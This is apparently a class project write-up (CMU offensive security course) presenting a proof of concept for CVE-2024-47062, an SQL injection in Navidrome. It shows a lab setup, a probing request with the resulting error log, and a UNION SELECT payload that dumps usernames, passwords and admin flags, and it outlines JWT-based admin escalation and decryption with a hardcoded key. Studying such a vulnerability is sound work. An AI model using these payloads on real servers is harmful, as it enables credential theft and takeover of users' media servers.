CVE-2024-47062 This PoC shows how an SQL Injection vulnerability in Navidrome (CVE-2024-47062) can be exploited to gain admin access. It explains how SQL Injection can reveal sensitive data, how to use a JWT token to obtain admin privileges, and how to decrypt passwords with a hardcoded key stored in Navidrome. This project was created for our Hacking and Offensive Security class (18-739D) at CMU. Team: Michael Crotty, Annie Liu, Tilden Jackson, Sai Sathvik Setup Create navidrome-music and navidrome-data directories. Download docker-compose.yaml, then run sudo docker-compose up -d to install the container. Navidrome.db is created when the instance is launched for the first time in the navidrome-data directory. Service can be accessed from https://127.0.0.1:4533 Exploitation SQL Injection Able to trigger SQL Injection when passed query as a parameter to the request. Queries are URL encoded before being passed in the URL. Error in the docker logs, after passing '=1 as parameter “` GET /api/radio?%27=1 HTTP/1.1 Log: SELECT count(distinct radio.id) as count FROM radio WHERE (' LIKE {:p0}) Response: "error":"unrecognized token: "' LIKE ?)"" – Dumped the user table, using the following payload `1=1) UNION SELECT id,user_name,password,is_admin,'','' FROM user –` GET…Read More